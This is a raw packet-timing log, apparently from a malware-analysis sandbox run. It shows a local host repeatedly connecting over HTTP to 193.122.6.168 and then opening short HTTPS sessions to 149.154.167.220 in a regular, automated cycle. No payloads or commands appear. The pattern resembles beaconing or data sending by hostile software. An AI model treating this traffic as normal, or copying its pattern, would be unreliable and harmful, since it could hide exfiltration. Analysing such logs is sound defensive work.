                                                                                                            Jan 10, 2025 21:41:08.481663942 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.481663942 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.481673002 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.481723070 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.481729031 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.481739044 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.481775045 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.481775045 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.481781006 CET44349794216.58.206.65192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.481813908 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.481813908 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.481813908 CET49794443192.168.2.8216.58.206.65
                                                                                                            Jan 10, 2025 21:41:08.804792881 CET4981980192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:08.809820890 CET8049819193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.809895992 CET4981980192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:08.810267925 CET4981980192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:08.815177917 CET8049819193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:09.614402056 CET8049819193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:09.618716002 CET4981980192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:09.623878956 CET8049819193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:09.803895950 CET8049819193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:09.855798960 CET4981980192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:10.257215023 CET49828443192.168.2.8104.21.64.1
                                                                                                            Jan 10, 2025 21:41:10.257268906 CET44349828104.21.64.1192.168.2.8
                                                                                                            Jan 10, 2025 21:41:10.257352114 CET49828443192.168.2.8104.21.64.1
                                                                                                            Jan 10, 2025 21:41:10.259759903 CET49828443192.168.2.8104.21.64.1
                                                                                                            Jan 10, 2025 21:41:10.259787083 CET44349828104.21.64.1192.168.2.8
                                                                                                            Jan 10, 2025 21:41:10.774475098 CET44349828104.21.64.1192.168.2.8
                                                                                                            Jan 10, 2025 21:41:10.774712086 CET49828443192.168.2.8104.21.64.1
                                                                                                            Jan 10, 2025 21:41:10.778330088 CET49828443192.168.2.8104.21.64.1
                                                                                                            Jan 10, 2025 21:41:10.778367996 CET44349828104.21.64.1192.168.2.8
                                                                                                            Jan 10, 2025 21:41:10.778722048 CET44349828104.21.64.1192.168.2.8
                                                                                                            Jan 10, 2025 21:41:10.782228947 CET49828443192.168.2.8104.21.64.1
                                                                                                            Jan 10, 2025 21:41:10.827332020 CET44349828104.21.64.1192.168.2.8
                                                                                                            Jan 10, 2025 21:41:10.925339937 CET44349828104.21.64.1192.168.2.8
                                                                                                            Jan 10, 2025 21:41:10.925489902 CET44349828104.21.64.1192.168.2.8
                                                                                                            Jan 10, 2025 21:41:10.925718069 CET49828443192.168.2.8104.21.64.1
                                                                                                            Jan 10, 2025 21:41:10.931377888 CET49828443192.168.2.8104.21.64.1
                                                                                                            Jan 10, 2025 21:41:16.495522022 CET4981980192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:16.500324965 CET8049819193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:16.694782019 CET8049819193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:16.707104921 CET49867443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:16.707154036 CET44349867149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:16.707214117 CET49867443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:16.707662106 CET49867443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:16.707683086 CET44349867149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:16.746397018 CET4981980192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:17.317369938 CET44349867149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:17.317478895 CET49867443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:17.344470978 CET49867443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:17.344495058 CET44349867149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:17.344847918 CET44349867149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:17.371156931 CET49867443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:17.415335894 CET44349867149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:17.415399075 CET49867443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:17.415421009 CET44349867149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:17.793725014 CET44349867149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:17.793813944 CET44349867149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:17.794198990 CET49867443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:17.794421911 CET49867443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:17.953216076 CET4981980192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:17.955277920 CET4987580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:17.958261967 CET8049819193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:17.958477020 CET4981980192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:17.960118055 CET8049875193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:17.960191011 CET4987580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:17.960401058 CET4987580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:17.965179920 CET8049875193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:18.613688946 CET8049875193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:18.614960909 CET49880443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:18.615004063 CET44349880149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:18.615156889 CET49880443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:18.615632057 CET49880443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:18.615645885 CET44349880149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:18.668334007 CET4987580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:19.222309113 CET44349880149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:19.224546909 CET49880443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:19.224561930 CET44349880149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:19.224674940 CET49880443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:19.224684954 CET44349880149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:19.687100887 CET44349880149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:19.687191010 CET44349880149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:19.687325954 CET49880443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:19.687755108 CET49880443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:19.691416025 CET4988580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:19.696368933 CET8049885193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:19.698801994 CET4988580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:19.698868036 CET4988580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:19.703651905 CET8049885193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:20.378555059 CET8049885193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:20.379586935 CET49891443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:20.379642963 CET44349891149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:20.379709959 CET49891443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:20.380002975 CET49891443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:20.380012989 CET44349891149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:20.418275118 CET4988580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:21.003854990 CET44349891149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:21.005868912 CET49891443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:21.005892038 CET44349891149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:21.005981922 CET49891443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:21.005990982 CET44349891149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:21.485801935 CET44349891149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:21.485884905 CET44349891149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:21.485934019 CET49891443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:21.486335993 CET49891443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:21.490037918 CET4988580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:21.490858078 CET4989880192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:21.495070934 CET8049885193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:21.495122910 CET4988580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:21.495682001 CET8049898193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:21.495757103 CET4989880192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:21.495853901 CET4989880192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:21.500690937 CET8049898193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:22.121169090 CET8049898193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:22.122656107 CET49904443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:22.122684002 CET44349904149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:22.123646021 CET49904443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:22.123909950 CET49904443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:22.123920918 CET44349904149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:22.168400049 CET4989880192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:22.743493080 CET44349904149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:22.756608009 CET49904443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:22.756624937 CET44349904149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:22.756782055 CET49904443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:22.756788015 CET44349904149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:23.162013054 CET44349904149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:23.162096977 CET44349904149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:23.162225008 CET49904443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:23.162683010 CET49904443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:23.166049004 CET4989880192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:23.167129993 CET4991080192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:23.170989037 CET8049898193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:23.171046972 CET4989880192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:23.171940088 CET8049910193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:23.171999931 CET4991080192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:23.172087908 CET4991080192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:23.176862001 CET8049910193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:24.005698919 CET8049910193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:24.007307053 CET49917443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:24.007348061 CET44349917149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:24.007440090 CET49917443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:24.007783890 CET49917443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:24.007797956 CET44349917149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:24.058945894 CET4991080192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:24.653040886 CET44349917149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:24.654793978 CET49917443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:24.654815912 CET44349917149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:24.654877901 CET49917443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:24.654886007 CET44349917149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:24.917733908 CET44349917149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:24.917809010 CET44349917149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:24.917861938 CET49917443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:24.918559074 CET49917443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:24.922050953 CET4991080192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:24.923125982 CET4992480192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:24.927000046 CET8049910193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:24.927069902 CET4991080192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:24.928004026 CET8049924193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:24.928073883 CET4992480192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:24.928162098 CET4992480192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:24.932897091 CET8049924193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:25.634325027 CET8049924193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:25.635641098 CET49929443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:25.635677099 CET44349929149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:25.635756016 CET49929443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:25.636054039 CET49929443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:25.636068106 CET44349929149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:25.684012890 CET4992480192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:26.260580063 CET44349929149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:26.262624979 CET49929443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:26.262655973 CET44349929149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:26.262727976 CET49929443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:26.262741089 CET44349929149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:26.614814043 CET44349929149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:26.614893913 CET44349929149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:26.614940882 CET49929443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:26.615278959 CET49929443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:26.618729115 CET4992480192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:26.621162891 CET4993780192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:26.623713970 CET8049924193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:26.623776913 CET4992480192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:26.626051903 CET8049937193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:26.626235962 CET4993780192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:26.626281023 CET4993780192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:26.631078959 CET8049937193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:27.253050089 CET8049937193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:27.254251957 CET49942443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:27.254300117 CET44349942149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:27.254365921 CET49942443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:27.254601002 CET49942443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:27.254616976 CET44349942149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:27.293292046 CET4993780192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:27.912113905 CET44349942149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:27.913748026 CET49942443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:27.913765907 CET44349942149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:27.913820028 CET49942443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:27.913829088 CET44349942149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:28.224004984 CET44349942149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:28.224075079 CET44349942149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:28.224271059 CET49942443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:28.224535942 CET49942443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:28.228176117 CET4993780192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:28.228537083 CET4994880192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:28.233549118 CET8049948193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:28.233635902 CET4994880192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:28.233674049 CET8049937193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:28.233841896 CET4994880192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:28.234213114 CET4993780192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:28.239419937 CET8049948193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:29.235835075 CET8049948193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:29.237102985 CET49955443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:29.237138987 CET44349955149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:29.237226963 CET49955443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:29.237474918 CET49955443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:29.237484932 CET44349955149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:29.277657986 CET4994880192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:29.887833118 CET44349955149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:29.890290976 CET49955443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:29.890331984 CET44349955149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:29.890384912 CET49955443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:29.890394926 CET44349955149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:30.314641953 CET44349955149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:30.314733028 CET44349955149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:30.314793110 CET49955443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:30.315135002 CET49955443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:30.319107056 CET4994880192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:30.320558071 CET4996080192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:30.324093103 CET8049948193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:30.324141026 CET4994880192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:30.325475931 CET8049960193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:30.325532913 CET4996080192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:30.325670004 CET4996080192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:30.330431938 CET8049960193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:30.949132919 CET8049960193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:30.951092005 CET49965443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:30.951132059 CET44349965149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:30.951284885 CET49965443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:30.951472044 CET49965443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:30.951488018 CET44349965149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:30.996427059 CET4996080192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:31.565001965 CET44349965149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:31.567729950 CET49965443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:31.567773104 CET44349965149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:31.567922115 CET49965443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:31.567929029 CET44349965149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:31.879698992 CET44349965149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:31.879827976 CET44349965149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:31.882776022 CET49965443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:31.883013964 CET49965443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:31.886105061 CET4996080192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:31.886806011 CET4997280192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:31.891026974 CET8049960193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:31.891613960 CET8049972193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:31.891685963 CET4996080192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:31.891705990 CET4997280192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:31.891844988 CET4997280192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:31.896584988 CET8049972193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:32.517910957 CET8049972193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:32.519346952 CET49977443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:32.519398928 CET44349977149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:32.519468069 CET49977443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:32.519793034 CET49977443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:32.519805908 CET44349977149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:32.558943987 CET4997280192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:33.136620045 CET44349977149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:33.138360977 CET49977443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:33.138390064 CET44349977149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:33.138452053 CET49977443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:33.138464928 CET44349977149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:33.495404005 CET44349977149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:33.495510101 CET44349977149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:33.495564938 CET49977443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:33.496006012 CET49977443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:33.499191999 CET4997280192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:33.500356913 CET4998480192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:33.504338980 CET8049972193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:33.504405022 CET4997280192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:33.505232096 CET8049984193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:33.505294085 CET4998480192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:33.505443096 CET4998480192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:33.510312080 CET8049984193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:34.140646935 CET8049984193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:34.142362118 CET49989443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:34.142407894 CET44349989149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:34.142493963 CET49989443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:34.142745018 CET49989443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:34.142755985 CET44349989149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:34.183917999 CET4998480192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:34.873944998 CET44349989149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:34.875524998 CET49989443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:34.875546932 CET44349989149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:34.875677109 CET49989443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:34.875682116 CET44349989149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:35.188759089 CET44349989149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:35.188838959 CET44349989149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:35.188937902 CET49989443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:35.189431906 CET49989443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:35.192322969 CET4998480192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:35.193515062 CET4999680192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:35.197592020 CET8049984193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:35.197670937 CET4998480192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:35.198540926 CET8049996193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:35.198635101 CET4999680192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:35.198707104 CET4999680192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:35.203576088 CET8049996193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:35.849348068 CET8049996193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:35.852283955 CET50001443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:35.852335930 CET44350001149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:35.852502108 CET50001443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:35.852771997 CET50001443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:35.852787971 CET44350001149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:35.902709007 CET4999680192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:36.528270006 CET44350001149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:36.530433893 CET50001443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:36.530445099 CET44350001149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:36.530514002 CET50001443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:36.530523062 CET44350001149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:36.757973909 CET44350001149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:36.758080959 CET44350001149.154.167.220192.168.2.8
